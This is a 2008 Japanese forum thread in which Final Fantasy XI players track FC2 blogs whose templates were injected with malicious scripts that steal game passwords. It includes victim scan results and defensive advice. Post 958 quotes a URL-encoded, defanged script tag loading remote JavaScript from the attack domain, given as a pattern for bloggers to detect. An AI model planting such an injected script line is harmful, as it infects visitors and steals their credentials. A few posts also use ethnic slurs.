簡単に言うと、同じルータに繋がってるPCがこれに感染するとパス抜かれる可能性がある。

843 :既にその名前は使われています:2008/03/23(日) 11:24:48.14 ID:ZvWhdQmX
VistaでNOD32とavast使ってるんだが不安になってきた。
NOD32使って感染した人いる?

844 :既にその名前は使われています:2008/03/23(日) 11:32:04.18 ID:sTHew//E
>>826のソースがあるとまずいらしいけど
ソースチェッカーでみてもそんなURLないっていわれるんだよなw

暗号化みたいのされてるのかな
%77%77%77が3つ続いてる部分が「www」っておもったんだけどどうなんだろ


845 :既にその名前は使われています:2008/03/23(日) 11:54:05.38 ID:xNN0W4a0
>>844
そうだよ。
URI decoderでググって出たところにその文字列貼ってみ。

846 :既にその名前は使われています:2008/03/23(日) 11:59:10.24 ID:Vrs+PchG
>>844
正解、URLエンコードってやつ。
ちなみにデコードすると・・・。

www■hellh■net/w■js

になる。(ピリオドは■に変えた)

847 :既にその名前は使われています:2008/03/23(日) 12:12:05.05 ID:sTHew//E
>>845-856
おーあたってたかwさんくす

動き的にはスクリプトだからこの暗号化されたURLがローカル落ちてきて
ローカルでデコードされてこの危険なURLみにいっちゃうってわけか

848 :既にその名前は使われています:2008/03/23(日) 12:31:17.54 ID:xNN0W4a0
FC2改竄ブログ
ヴァナモンblog 1回改竄、ウイルスまきちらし中
ある黒魔道士の軌跡 1回改竄、ウイルスまきちらし中
ペコろぐ 1回改竄、修正済み
某青魔道士 2回改竄、閉鎖
戦士スキー 2回改竄、修正済み
ぺってん 1回改竄、修正済み
黒猫奮闘記 1回改竄、修正済み

849 :既にその名前は使われています:2008/03/23(日) 12:35:41.58 ID:4uSd7bE+
ヴァナモンとある黒、ソースチェッカーで見てソース内を検索しても、
怪しいところが分からないんだけど……
%77で検索しても何もかからない。どこが×なのか教えてplz。
どちらも今のところFireFox+Noscript、カスペ先生入りで今のところ反応なし。

850 :既にその名前は使われています:2008/03/23(日) 12:37:15.98 ID:xNN0W4a0
>>847
ブラウザやサーバの標準的な機能。

ASCII(英数)は問題ないけど、他は基本的にまずいんで。
たとえば「あいうえお」でググるとこういう文字列がポストされる。
ttp://www.google.co.jp/search?hl=ja&q=%E3%81%82%E3%81%84%E3%81%86%E3%81%88%E3%81%8A
この右側ね。
URIにも当然使えるということで
ttp://%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%2e%6a%70/
(www.google.co.jp)
みたいに書ける。

851 :既にその名前は使われています:2008/03/23(日) 12:43:42.48 ID:xNN0W4a0
>>849
Fx+NoScript+Kasperskyならかなり安全だ。
>>826 見てわからんのなら余計な冒険心は出さないほうがいい。

ソースチェッカーはキャッシュを持ち、改竄前のソースが出る
(かもしれん、よく知らん)のでその辺も念頭に。

852 :既にその名前は使われています:2008/03/23(日) 12:44:08.16 ID:g/oa7LZ3
■□■fc2ブログ改竄による垢ハックウイルス感染にご注意!■□■

昨年から猛威を振るっているパス抜きウイルスによるアカウントハックですが、先日より
新たな手口の罠が発覚し、多数の感染者が出ている模様です。その手口とは、主にFF11を扱っている
fc2ブログのテンプレート部分を何らかの手段で改竄し、ウイルスURLへ誘導するというものです。
これまでに改竄されたことが分かっているfc2ブログは以下のとおり

■改竄被害ブログ一覧
   黒猫奮闘記 (1回改竄され修正済み)
   ぺってん (1回改竄され修正済み)
   戦士スキー (2回改竄され修正済み)
   某青魔道士 (2回改竄され閉鎖)
   ペコろぐ (1回改竄され修正済み)
   ヴァナモンblog(改竄されてウィルスまきちらし中) ←要注意!
   ある黒魔道士の軌跡(改竄されてウィルスまきちらし中) ←要注意!

最近これらのブログやその他fc2のブログを閲覧したことのある方は、各種セキュリティソフトや
オンラインスキャンでウイルスチェックを行ってください。対策などは以下のスレにて
●● RMT業者の垢ハックが多発している件13 ●● http://live27.2ch.net/test/read.cgi/ogame/1205225002/
FC2ブログを見に行くと垢ハックされるぞ http://live27.2ch.net/test/read.cgi/ogame/1206155257/

853 :既にその名前は使われています:2008/03/23(日) 12:47:05.23 ID:g/oa7LZ3
20行だとこれくらいしか入らないな
一応作ってみたけど適当に改良してくれ

854 :既にその名前は使われています:2008/03/23(日) 12:55:31.13 ID:3Q8DZLa7
FC2に何か穴があるんじゃないか?
アクセス数稼いでるFFブログは他にも多いだろうに、FC2だけ狙い撃ちだし。

855 :既にその名前は使われています:2008/03/23(日) 12:57:58.68 ID:g/oa7LZ3
>>849
FFXI(仮)ってとこで今回の罠の解析をやってたから引用させてもらう

>おっと、ASPです(CGIみたいなもの)。
>処理は推測するしかありませんが、おそらく以下のようになっています。
>初回アクセスのHTTPヘッダ
>Location: error.htm
>次回アクセスのHTTPヘッダ
>Location: http://search■fc2■com

>解析を避けるためか、2回目以降はFC2に飛ばしてしまいます。

とのこと。正常に表示されるってことは、
もしかしたら既に一回hell■netにアクセスしたことがあるのかもしれない。
ちなみにそのFFXI(仮)もfc2ブログだから、自分で見るときは一応自己責任で

856 :既にその名前は使われています:2008/03/23(日) 12:58:00.13 ID:5xv78arS
>>854
まあそうなんだけどfc2が調査しますといったきり
なしのつぶてなので何とも言えないのが現状。
ネ実の空気的にはfc2に脆弱性があり、
そこを現在進行形で攻められているといったかんじ。

857 :既にその名前は使われています:2008/03/23(日) 13:00:38.50 ID:xNN0W4a0
>>855
晒すなよ;;

858 :既にその名前は使われています:2008/03/23(日) 13:05:10.80 ID:g/oa7LZ3
>>857
おやご本尊が居たかw
hellhでぐぐったらトップだよw

859 :既にその名前は使われています:2008/03/23(日) 13:09:55.56 ID:xNN0W4a0
>>858
そんな簡単にクラックされるもんか? と思って
作ってみたが、罠コメ1つ来やしねぇw

860 :既にその名前は使われています:2008/03/23(日) 13:16:25.12 ID:g/oa7LZ3
>>859
ブログにID出したなw
あれだけセキュリティっぽいことばっかり書いてると流石に狙われないと思うぞw

861 :既にその名前は使われています:2008/03/23(日) 13:30:52.44 ID:xNN0W4a0
作って思ったけど、FC2が圧倒的なシェアを持つ要因は
自由度の高さの他にテンプレの豊富さにあると思った。
ただこのテンプレ、公式(自分の使ってるあのキモいのも公式)以外に
共通テンプレートというユーザが作った物も大量にある。
そっちに仕掛けて登録したんじゃないかなぁ。

862 :既にその名前は使われています:2008/03/23(日) 13:40:04.15 ID:xNN0W4a0
1個追加する羽目になった。

■改竄被害ブログ一覧
   黒猫奮闘記 (1回改竄され修正済み)
   ぺってん (1回改竄され修正済み)
   戦士スキー (2回改竄され修正済み)
   某青魔道士 (2回改竄され閉鎖)
   ペコろぐ (1回改竄され修正済み)
   ヴァナモンblog (改竄されてウィルスまきちらし中) ←要注意!
   ある黒魔道士の軌跡 (改竄されてウィルスまきちらし中) ←要注意!
   FF11初心者の館 (改竄されてウィルスまきちらし中) ←要注意!

863 :既にその名前は使われています:2008/03/23(日) 14:29:58.48 ID:xNN0W4a0
下2つの罠は新ドメイン。
fccja■com
IPがhellhの1つ違いなので同一犯だろう。
検体は入手、提出済み。

864 :既にその名前は使われています:2008/03/23(日) 14:52:54.96 ID:+GAVa0zj
age

865 :既にその名前は使われています:2008/03/23(日) 15:28:34.38 ID:SkNOzZnD
ag

866 :既にその名前は使われています:2008/03/23(日) 15:32:47.34 ID:qVzDo+fV
びすたwでカスペルオンラインスキャン動かないよage
PG2も動かないよage
びすたw氏ねよage

867 :既にその名前は使われています:2008/03/23(日) 15:44:44.72 ID:67blZkYV
いらない子OSで有名なビスタなんか入れるのは自業自得。

868 :既にその名前は使われています:2008/03/23(日) 15:53:39.73 ID:IqbHZafj
Me:…ひさしぶりにわたしのでばんですssssss

869 :既にその名前は使われています:2008/03/23(日) 16:37:33.93 ID:IFeQsj78
日曜だからかどんどんさがるなぁ。

870 :既にその名前は使われています:2008/03/23(日) 16:45:38.70 ID:hP7NGMjJ
PS2も360も安全じゃない。とかいういい加減な馬鹿は、ソースだせw
煽るのもいい加減にしろよ?

もしも、PS2、箱で抜かれた奴いたら報告してくれw
全く、知識もないくせに煽りは一流だな。

871 :既にその名前は使われています:2008/03/23(日) 16:47:45.78 ID:g/oa7LZ3
>>868
お前のおかげでCTRL+ALT+SHIFT+DELを押すことに躊躇いを感じなくなったよ
が、お前もカスペのオンラインスキャン未対応だから黙ってろw

872 :既にその名前は使われています:2008/03/23(日) 17:06:47.22 ID:xNN0W4a0
Shiftいらないだろw

873 :既にその名前は使われています:2008/03/23(日) 17:10:16.68 ID:5xv78arS
>>870
>>842のシマンテックレポートってどうなの。
その辺解説頼む。

874 :既にその名前は使われています:2008/03/23(日) 17:31:00.62 ID:uO8R4ZzD
>>873
古いハブ(リピータハブ)を使ってなければ大丈夫

普通に売ってるハブはスイッチんぐハブといって
他の機材宛のパケットは送られてこないハブだからキャプチャできない

例外は
ICS(インターネット接続の共有)ってWindowsの機能を有効にしていると
PCがルーターとして働くので
WAN宛てのパケットがPCに送られてくるんでキャプチャ可能になる


875 :既にその名前は使われています:2008/03/23(日) 17:31:59.84 ID:6PJIpzDK
箱とかでキーボード使って、パスとか入力したら>>842
奴で抜かれる可能性あるんじゃね?

876 :既にその名前は使われています:2008/03/23(日) 17:50:41.66 ID:qnf1RAqF
>>875
せっかく>>874が解説してくれてるのに理解してないのか。
FFにたとえるとだな、
昔のハブ(ダムハブ)を使っていると、/sayで喋ってるのと同じで
近くにいる香具師全員に聞こえていた。普通はオレ関係ねーなと
無視するが、>>842みたいのが聞き耳たててるとパス抜かれる。

最近のハブ(スイッチングハブ)は/tellで喋るのと同じで
近くにいようと関係ない香具師には聞こえなくなってる。
ただしインターネット接続の共有を使ってると、スパイ本人に
/tellでパス教えることになるのでヤバい。

877 :既にその名前は使われています:2008/03/23(日) 17:59:11.64 ID:d6uoand2
>>876
要するにダムハブはこうなの?
●<俺のIDとPASS○○○
■<把握した
▲<関係無いんだが聞こえる

878 :既にその名前は使われています:2008/03/23(日) 17:59:18.60 ID:5xv78arS
AcePasswdSnifに感染しても
古いハブを使っておらず、インターネット接続の共有をしていなければ
大丈夫ということか。
PS2や360でパス抜きされるのは本当に特殊な状況でのみなのね。

879 :既にその名前は使われています:2008/03/23(日) 18:00:06.03 ID:fIC9E8u/
ageてくれ

880 :既にその名前は使われています:2008/03/23(日) 18:01:49.53 ID:6PJIpzDK
>>876
単なるリロードし忘れ今見て気づいた(´・ω・`)

881 :既にその名前は使われています:2008/03/23(日) 18:08:08.66 ID:6GrFKvea
■は放置かねー
被害にあった人に、最低限の保障でもしてくれれば見方が変わるのに
今はユーザーが自分でアイテムを渡したってことにされてるんだよな・・・

設定で、アイテム類を絶対に捨てられないようにとか出来ないかね

882 :既にその名前は使われています:2008/03/23(日) 18:10:00.60 ID:+ABptBt9
全くチョンはロクな事しねぇな

883 :既にその名前は使われています:2008/03/23(日) 18:14:29.02 ID:cPH94Qia
>>753
こういうスレでそういうショボい煽りするくらいならIE6でセキュリテイ高設定で
感染する感染経路について語った上で、

ただ高に設定するだけでお前が満足ならそうすれば

とでも言えよ。
くだらない駄レスしてんなよな。

884 :既にその名前は使われています:2008/03/23(日) 18:17:25.38 ID:ZLisMUnl
えっと、PS2とパソの2台でFFやってて、
PS2はパス記憶、パソはパス手打ちにしてるんだけど、これで問題ないでしょうか?


885 :既にその名前は使われています:2008/03/23(日) 18:23:24.31 ID:6PJIpzDK
>>883
まあこれも十分駄レスだよな

886 :既にその名前は使われています:2008/03/23(日) 18:26:23.03 ID:BF1y+lk+
>>878
感染もなにも、「Ace Password Sniffer」はオンライン販売されているソフト
フリーのパケットキャプチャソフトにパスワード抜き出しツールを被せたもの
シマンテックはこれを「好ましからざるソフト」に分類した
カスペルスキーがWinnyやShareを「好ましからざるソフト」扱いするのと同じ

みんなが説明してくれているように、リピータハブを使っていてかつ業者と
同居していなければPS2やXBOXがやり取りするデータがPCに流れることはないよ
たとえ流れても、専用の解読ツールでも作らない限りパスは抜けない

887 :既にその名前は使われています:2008/03/23(日) 18:32:58.65 ID:d6uoand2
つまみ弄ってるだけで感染しないならカスペとか要りませんよね

888 :既にその名前は使われています:2008/03/23(日) 18:36:52.68 ID:g+xzTRP1
>>884
手打ちでも抜かれる時は抜かれる
もう一度>>4-6>>14-15をよく読んで

889 :既にその名前は使われています:2008/03/23(日) 18:44:04.70 ID:pHJE1UMO
>>866
おれもvista使いだがカスペル君ふつーに快適だぜ?
オンラインスキャンじゃなくて、体験版落してインスコするよろし。
 
そのあと全スキャンだ。(初回はちょー時間かかるw)
 
 
まだ出てきてないけど仕組まれてるブログ多そうだよな・・・

890 :既にその名前は使われています:2008/03/23(日) 18:44:44.37 ID:g+xzTRP1
ちょっと言葉足りなかった
>>15でブログ持って無くても他人のを見るなら、iframe無効にした方が良いね

891 :既にその名前は使われています:2008/03/23(日) 18:45:24.88 ID:sX7m8coI
>>861
それはないな
改竄されたブログのなかで以前から見ていたところもいくつかあるが
テンプレを新しくした途端になったという類のものじゃねー
仕掛けて登録したとかいうほどちゃちなもんじゃねーよ


892 :既にその名前は使われています:2008/03/23(日) 18:48:33.79 ID:cPH94Qia
>>891
FC2のルート権限に近いとこが乗っ取られてFFXIでヒット数多いブログから
iframe埋め込まれていったって感じかね?

893 :既にその名前は使われています:2008/03/23(日) 18:49:56.33 ID:3CXZSf/k
>>861
テンプレ登録は誰でも自由にできるものじゃなくて
申請してから数日かけてFC2側がチェックして
問題ないと承認されて初めてうpされる仕組み。
さすがに罠テンプレは登録できねえ。プラグイン登録も同様ね。


894 :既にその名前は使われています:2008/03/23(日) 18:52:11.63 ID:5xv78arS
まあFF以外でも今回の被害は酷いみたい。
http://www.watch.impress.co.jp/game/docs/20080321/on0321.htm
でニュースになってるくらいだから相当規模が大きかったんだろうね。
リネでもWoWでも「アカハック気をつけてね!」と
(気休めではあるが)注意を促しているというのに、FF11ときたら・・・

895 :既にその名前は使われています:2008/03/23(日) 18:54:48.01 ID:9CfIjSPs
これ感染したブログ行ってもレジストリの変更常に監視しとけば防げるもの?


896 :既にその名前は使われています:2008/03/23(日) 18:57:35.92 ID:ZLisMUnl
>888
ありがとう。>4-5はほとんどやってるんです…。
あとは超こまめにPS2からパスを変えまくるくらいしかないのかな。
PC2台用意できればいいんだろうけどスペース的に無理><

897 :既にその名前は使われています:2008/03/23(日) 19:02:12.25 ID:xNN0W4a0
■改竄被害ブログ一覧
 黒猫奮闘記 (1回改竄され修正済み)
 ぺってん (1回改竄され修正済み)
 戦士スキー (2回改竄され修正済み)
 某青魔道士 (2回改竄され閉鎖)
 ペコろぐ (1回改竄され修正済み)
 ヴァナモンblog (1回改竄され修正済み)
 Lostfr【誰か】かまって【くれませんか?】 (1回改竄され修正済み)
 ある黒魔道士の軌跡 (改竄されてウィルスまきちらし中) ←要注意!
 FF11初心者の館 (改竄されてウィルスまきちらし中) ←要注意!

1個修正、1個追加。

898 :既にその名前は使われています:2008/03/23(日) 19:11:47.00 ID:gxX/zfaz
>>881
犠牲者も相変わらず課金してるのが居るだろうし、
犠牲者ではなくとも対応しない事で課金しなくなる事がないなら
スクエニはともかく、株主は資金つぎ込む事に反対するだろう。

899 :876:2008/03/23(日) 19:17:32.84 ID:qnf1RAqF
>>877
すまんメシ行ってた。それであってる。

あと、南米だかどこだかで広く使われてるルータそのものがハックされた
という事例があったと思う。その場合はインターネット接続共有してるPCが
やられたのと同じ状態にはなるな。
日本でルータを狙うとしたら、ヤフBBとかか?

>>878
PS2や360でプレイしていても、セキュ甘いPCでLSコミュ見てたら
危ないという可能性はある。あまり油断しない方がいい。

900 :既にその名前は使われています:2008/03/23(日) 19:19:39.67 ID:uO8R4ZzD
ルーターのSMNP脆弱性を突いてXSS仕掛けるとかいう記事を最近読んだきがする

901 :既にその名前は使われています:2008/03/23(日) 19:28:47.88 ID:NNgXQbyq
なるほど。ドリームキャストが最強ってことだな?

902 :既にその名前は使われています:2008/03/23(日) 19:36:01.52 ID:nS7LdL6n
R7なら言うことないな

903 :既にその名前は使われています:2008/03/23(日) 19:38:07.94 ID:/4hrJxrn
ドリームキャストの起動音は坂本龍一

坂本<地味だとか言われるんですけどあの画には合ってると思うんですよね

904 :既にその名前は使われています:2008/03/23(日) 19:51:12.67 ID:gxX/zfaz
良く分からんがルータークラックして打ち込んだURLと違う所に飛ばす
ッて言う手法があるって記事読んだ事があるな。
ちなみにIP(192.168.1.1等)直打ちだとちゃんと目的の所に飛ばされるが
h t t p ://www■playonline■com/ff11/index■shtml
とかだと偽装した所に飛ばされるそうな。

905 :既にその名前は使われています:2008/03/23(日) 19:51:25.31 ID:71EMJ3TS
注意喚起!
緊急浮上!

906 :既にその名前は使われています:2008/03/23(日) 20:00:15.43 ID:Y0PuukFM
ドーリームキャストの起動音どんなだっけ?

907 :既にその名前は使われています:2008/03/23(日) 20:20:04.09 ID:lKr76C0u
>>906

わちちょん!

908 :既にその名前は使われています:2008/03/23(日) 20:23:26.50 ID:Gy8CwQuV
何と言うファストブレード・・・

909 :既にその名前は使われています:2008/03/23(日) 20:41:21.13 ID:dUlWM6x6
この土日 
もっと被害報告が多発するかと思ったけど 
意外に少なかったなあ 

だいぶ浸透してきたのだろうか

910 :既にその名前は使われています:2008/03/23(日) 20:44:47.69 ID:G7FSqg9o
ギルの価値がなくなれば業者も撤退する(アカハックしなくなる)から、ゲーム内の通報も頼むぜ
最近、春厨急増で通報スレ落ちたから保守もたのむ

911 :既にその名前は使われています:2008/03/23(日) 21:38:11.23 ID:g/oa7LZ3
物凄い勢いで落ちていくな保守

912 :既にその名前は使われています:2008/03/23(日) 22:50:13.92 ID:IFeQsj78
保守クポー。

913 :既にその名前は使われています:2008/03/23(日) 22:52:50.03 ID:DSymiHcE
>>910
罠を張りまくってる奴が生息している四川省などは、
手取り年収2万円とかだしな。
1日100円あれば生活できる世界だ。業者手ごわしw

914 :既にその名前は使われています:2008/03/23(日) 23:06:07.41 ID:PckGZDMW
>>894
□でも気休め程度ならいってるぞw>注意

915 :既にその名前は使われています:2008/03/23(日) 23:09:59.84 ID:Y0PuukFM
>>894
eq2はハック前まで戻してくれたんだな
ソニー系は一律か?

スクエニはどうした?

916 :既にその名前は使われています:2008/03/23(日) 23:13:19.25 ID:PckGZDMW
>>915
エクレアは一回限り復活というのが最近の流れっぽい
過去ログでもある

ところで、公式に何が来たかまだ教えてくれないのかね

917 :既にその名前は使われています:2008/03/23(日) 23:22:42.56 ID:Y0PuukFM
おれじゃねぇーw

918 :既にその名前は使われています:2008/03/23(日) 23:25:54.77 ID:Y0PuukFM
ジャスミンオンライン板に凶悪な抜き物がUPられた

919 :既にその名前は使われています:2008/03/23(日) 23:43:15.27 ID:/4hrJxrn
業者はジャスミンを理解してるのだろうか・・・

920 :既にその名前は使われています:2008/03/23(日) 23:58:26.46 ID:DzS5YI25
シナ駆逐支援あげ

921 :既にその名前は使われています:2008/03/24(月) 00:02:15.07 ID:1XW8eX52
今月も自慢げに凍結ギルの総額を発表するんだろうが垢ハックから得た金が凍結されてるのかと思うとやるせないな

922 :既にその名前は使われています:2008/03/24(月) 00:04:14.04 ID:3J7BYvf2
バハ鯖で、今垢ハックがあった

923 :既にその名前は使われています:2008/03/24(月) 00:07:58.27 ID:jzSS9EQW
■からみたらハックにあった人は100万分の1人だろうけど
ハックにあった人はそれがすべてだからな〜
早く対処してもらいたいもんだ

924 :既にその名前は使われています:2008/03/24(月) 00:13:35.33 ID:7DTVIQ6X
FCブログの騒動は自衛でなんとかなるもんじゃないしなあ
週明けてもだんまり決め込むのかな

925 :既にその名前は使われています:2008/03/24(月) 00:15:26.78 ID:rpE40Jdl
http://live27.2ch.net/test/read.cgi/ogame/1205774044/
バハ鯖↑
いまハックされた人が来たんですけど、今できることってやっぱサポセン開くまでですかね・・・

926 :既にその名前は使われています:2008/03/24(月) 00:15:41.31 ID:ZfckpKA+
こちらへ誘導されてきました<(_ _)>バハムートのLirisです。
アカウントを取られてしまったようなので色々教えて欲しくて来ました。
駆除する方法は、どうやったら良いでしょうか?よろしくお願いします<(_ _)>

927 :既にその名前は使われています:2008/03/24(月) 00:16:03.32 ID:Ebm+e59Y
せめて公式で呼びかけろよなっておもうわw
企業がこの騒動を知らないわけじゃないし
ここ見てなくてブログ巡回してる人なんてゴロゴロいるわけだしな


928 :既にその名前は使われています:2008/03/24(月) 00:18:01.53 ID:J6GiBSTn
>>926
テンプレの>>7-9を読む。

929 :既にその名前は使われています:2008/03/24(月) 00:20:28.29 ID:J6GiBSTn
カスペルスキーオンラインスキャンでウイルスが見つかるかチェックする。
見つかった場合はウイルスの名前をこのスレッドに書いてくれると
後の被害者が減るかもしれない。
よくわからなかったらOS入れなおし。

930 :既にその名前は使われています:2008/03/24(月) 00:20:34.64 ID:xDF5nHrk
>>926
インできるリアルフレがいれば
ヴァナからGMに連絡とって キャラを止めてもらえる
とりあえずどんな形でもキャラ止めろ
朝まで放置しておくと
鯖移動されたりエクレアまで捨てられる可能性が大

931 :既にその名前は使われています:2008/03/24(月) 00:22:04.13 ID:7DTVIQ6X
>>930
俺のフレはリアフレの垢からGMに直訴しても止めてもらえなかったそうだ
先週の件は異例なんじゃないのか?
どのみち糞使えない管理体制だ

932 :既にその名前は使われています:2008/03/24(月) 00:26:04.56 ID:xDF5nHrk
>>931
マジかそれ・・・
サポセンは朝まで使えんならどうにもならんな・・・
相変わらずの糞管理だな・・・

933 :既にその名前は使われています:2008/03/24(月) 00:26:34.51 ID:rpE40Jdl
今どっちのキャラもいないっぽいです〜。倉庫は一体だけですか?

934 :既にその名前は使われています:2008/03/24(月) 00:29:45.83 ID:rpE40Jdl
>>926
今バハスレ変な荒らしが沸いてあぼ〜んしないと読みにくい事になってるので、
私はこっちにサーチ状況かいてきますね。いまはスキャン中かな

935 :既にその名前は使われています:2008/03/24(月) 00:36:20.58 ID:ZfckpKA+
>>928
わかりました、よく読んできます<(_ _)>

>>929
了解です、今さっそくやっている最中です。
後ほど報告します

>>930
鯖スレの方々にも色々とやっていただきました。
あとは明日、サポートセンターへ電話してみようと思います。

>>933
一人だけです。倉庫にはほとんど何も送ってませんので…

>>934
そうです、間もなく終わると思います。

936 :既にその名前は使われています:2008/03/24(月) 00:51:16.34 ID:NqCGjbde
>>935
サポセンに電話する時に用意するもの
・POLからきた登録ハガキ
・POL FFXIソフトについてたもの
本人確認で色々聞かれるので即答できるように準備を
日本語でおkな人もココ見てるようなので詳しくは書けません
あとゲーム内のキャラのことでも確認される場合あり

月曜は電話つながりにくいので家の電話と携帯あれば2台駆使してかけまくってみて下さい

937 :既にその名前は使われています:2008/03/24(月) 00:54:25.99 ID:7DTVIQ6X
サーチにかからないことで安心はまずいかも
鯖移動させられてる可能性がある
俺のフレはログアウト後別鯖に飛ばされてた

938 :既にその名前は使われています:2008/03/24(月) 01:01:14.47 ID:V0clbcIb
anonにしてなかったらPOLのフレンドサーチで今どこにいるかは見れるな。

939 :既にその名前は使われています:2008/03/24(月) 01:01:44.03 ID:rpE40Jdl
クレカだったら使われちゃうかもですね、、、
シャウトしたんですが、サンドじゃやはりフレの方は見つけられませんでした><
でも、フレがアカハックにあったって方が協力申し出てくれました。現状はLirisさんのキャラ見つけたら
とかの情報のみになっちゃいますが・・・。

940 :既にその名前は使われています:2008/03/24(月) 01:02:30.67 ID:vQXYTLxz
>>932
■がきちんとした方針を出してないから外れGMひくとアウトだと思われ。

941 :既にその名前は使われています:2008/03/24(月) 01:05:34.13 ID:ZfckpKA+
>>939
ありがとうございます!クレカではなくウェブマネーですが今月で切れちゃうんですよね…orz

942 :既にその名前は使われています:2008/03/24(月) 01:10:52.51 ID:rpE40Jdl
Lirisさん変なメールきてない?荒らしが酷いことになってるけど・・・。ああいうのって規制できないのかなぁ
あと、バハスレにアカ余分にもってるけど使う?って聞いてきてる方がいるので、返事をお願いします
パニック状態だろうけど・・・がんばってください。
私もバハなので、できる事ならお手伝いしますので・・・><

943 :既にその名前は使われています:2008/03/24(月) 01:12:21.05 ID:SUKEKrB0
今荒らしてるやつどうせ口だけのやつだろうしほっとけばいいんじゃねーかw


944 :既にその名前は使われています:2008/03/24(月) 01:12:21.68 ID:aCIWlJ1+
日を追うごとに深刻になってるな・・・・・
スクエニはとりあえず対策云々の前にもっと注意の喚起しろよ・・・・・

とりあえず対策自分なりにまとめた
windowsupdateを欠かさない
ウィルスソフトを入れる、更新をサボらない(カスペがお勧め?)
PG2導入
PC用FF用にマシンを分ける(これはモデム→ルーター→ハブ→PC、PS2とかにすんのか?だれかおしえてくれ)
real playerアンインスコ
IEは避ける。firefoxとかを使ってiframeなどの禁止設定

いまんとここんぐらいか、PG2もいつまで効果期待できるかわからんだろうし・・・・・・
リネ2とかの公式の対応とかどんなんなんだろうか?


945 :既にその名前は使われています:2008/03/24(月) 01:16:57.02 ID:2S7MefoA
マジでこの悪夢が終わることを願う。
とりあえず寝る前にあげとく。

946 :既にその名前は使われています:2008/03/24(月) 01:17:01.25 ID:7DTVIQ6X
まず公式で大々的に、ついでにゲーム中でも注意喚起くらいしろよ
認証方式の変更や被害者への補償もいい加減したっていいんじゃないか
かわいそすぎて見てられないわ

947 :既にその名前は使われています:2008/03/24(月) 01:19:37.56 ID:aCIWlJ1+
>>946
ほんとになぁ・・・・・
課金再開したときくらいしか送ってこないpolメールとか活用しろよな・・・・

948 :既にその名前は使われています:2008/03/24(月) 01:19:41.50 ID:ZfckpKA+
>>942
メールは規制できるので問題ありません…たぶんですけど。
心配してくださってありがとうございます<(_ _)>

>>944
参考にします!


一箇所だけですが結果が出ました。

ターゲットの選択: 重要な領域
ソース:
E:\WINDOWS;
E:\DOCUME~1\ユーザー名\LOCALS~1\Temp\;

゛Trojan-PSW.Win32.OnLineGames.lbb"
↑これが危ないみたいです

949 :既にその名前は使われています:2008/03/24(月) 01:25:49.10 ID:ddVbsWZc
今知ったfc2ブロガーなんですが、自分のブログが感染してるかどうかは
どうやって診断すりゃいいんでしょうか。
とりあえずソースをiframeで検索しただけだと怪しいのは無いんですが。

950 :既にその名前は使われています:2008/03/24(月) 01:29:32.48 ID:hdKDzAOI
フレにGMを代わりに呼んでもらって、事情を話してもらうとかはどぉ?
リアルメルアドとか知ってないとアレだが…
白門でフリーズしまくったときにはフレにメールしてGM呼んで対応してもらった。
問題はハックされたキャラへGMからtell来た後の対応がどうなるか…
複数のフレに連絡してもらった方がいいのかねぇ?

951 :既にその名前は使われています:2008/03/24(月) 01:30:51.62 ID:Q/ktx4QO
>>944
>PC用FF用にマシンを分ける
可能であれば、次のような構成にする。(等幅フォント推奨)

モデム − ルータ1 − ルータ2 − FFXI用PC
          |- ルータ3 − スイッチングハブ − その他いろいろ

ルータ1でグローバルとローカルのセグメントをまず分ける。
 192.168.1.1-255 subnet 255.255.0.0
ルータ2で1つめのローカルセグメントに分ける。
 192.168.2.1-255 subnet 255.255.0.0
ルータ3で2つめのローカルセグメントに分ける。
 192.168.3.1-255 subnet 255.255.0.0
これで、ルータ2とルータ3のネットワークは論理的にも物理的にも隔離できる。

952 :既にその名前は使われています:2008/03/24(月) 01:31:38.82 ID:DyD4MS3I
>>948
ウイルス対策ソフトは持ってないのか?
無いならKasperskyの体験版がオススメだな
ダウンロードはココから
http://www.just-kaspersky.jp/products/try/

>>949
iframeだけじゃなくscriptも検索

953 :既にその名前は使われています:2008/03/24(月) 01:32:17.70 ID:RFGY8cIB
>>950
先週の件を見ていた限りだと第三者からのコールじゃ動いてもらえない感じ

954 :既にその名前は使われています:2008/03/24(月) 01:33:06.49 ID:rpE40Jdl
そのままカスペのトライアル版インスコして駆除したらどうでしょう
使ってるPCにアンチウィルスソフトあるなら、それで削除できたらいいかもですが・・・
バハスレでアカウント使わせてくれるって言ってる方の、借りたほうがいいですよ
後でやりとりして納得する返し方すればいいんですし。でないと上で書かれてる方がいるように
鯖移動とか業者の手伝いキャラにされてるとか・・・被害増えそうですし

955 :既にその名前は使われています:2008/03/24(月) 01:33:50.24 ID:cxfdIhE2
>>950
垢ハックではフレは役に立てないよ
GMは本人の申し出からのみキャラの保護をするというのが先週末の騒動のときの流れ

GMからすれば第三者から言われても嫌がらせと区別できないというのもある



956 :既にその名前は使われています:2008/03/24(月) 01:35:10.09 ID:ZfckpKA+
>>950
メール交換しているフレ等にはメールしましたが、みんな寝てる人でorz
明日には手遅れかもしれませんが、待つしかなさそうな感じです。

>>952
ありがとうございます<(_ _)>オンラインスキャンが終わったら導入してみます。

途中結果ですが
・ターゲットの選択: メモリ
ソース: 実行中の全てのプロセス

コレが引っかかりました↓
"Trojan-Downloader.Win32.Delf.dsz"

スキャンしたファイル: 1826
見つかったウイルス: 3
感染したオブジェクト: 27
疑わしいオブジェクト: 0
スキャンプロセスの所要時間: 00:00:50

957 :既にその名前は使われています:2008/03/24(月) 01:35:51.99 ID:RFGY8cIB
他人のキャラ借りてのコールはOKだっけ
厳密には規約違反です、と注意されたという書き込みはみたんだが
それでOKだったのかはちょっと覚えていないな

958 :既にその名前は使われています:2008/03/24(月) 01:37:42.98 ID:47bjLYLG
>>949
あとはJavaScriptもですね。
例を出すと

<script language="javascript" src="hxxp://%77%77%77%2E%66%
63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73"></script>

hxxpはhttpで頭の中で変換してください。

こういったJAVAスクリプトが張られていないか探してみてください。

959 :既にその名前は使われています:2008/03/24(月) 01:38:50.27 ID:We8pVkNe
>>956
これか?

960 :既にその名前は使われています:2008/03/24(月) 01:39:14.07 ID:aCIWlJ1+
>>951
サンクス

けっこうややこしそうだな・・・・、セグメントとかまったく初耳/(^o^)\
ルーターの設定とかわからんぜ、とりあえずネットはルーター通してつないでるが・・・・・
わかりやすく解説してるサイトとかないものか\(^o^)/

961 :既にその名前は使われています:2008/03/24(月) 01:39:21.79 ID:DyD4MS3I
レジコもらって新規アカウントでGMコールした人は
倉庫キャラの名前全部と倉庫キャラがいつもいる場所とかの質問で本人確認されてから
垢停止してもらえてたかな

